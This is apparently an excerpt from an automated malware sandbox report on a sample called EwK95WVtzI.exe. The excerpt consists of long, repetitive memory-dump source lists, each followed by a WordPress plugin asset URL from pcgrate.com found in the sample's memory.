00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=5
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.3.
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/email-subscribers/lite/public/css/email-subscribers-public
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/email-subscribers/lite/public/js/email-subscribers-public.
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/feedback-modal-for-website/assets/css/fm-public.css?ver=1.
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/feedback-modal-for-website/assets/icons/line-awesome/css/l
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/feedback-modal-for-website/assets/js/fm-public.js?ver=1.0.
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/css/frontend.min.css?ver=3.3.1
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/frontend.min.js?ver=3.3.1
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/preloaded-elements-handlers.min.js?
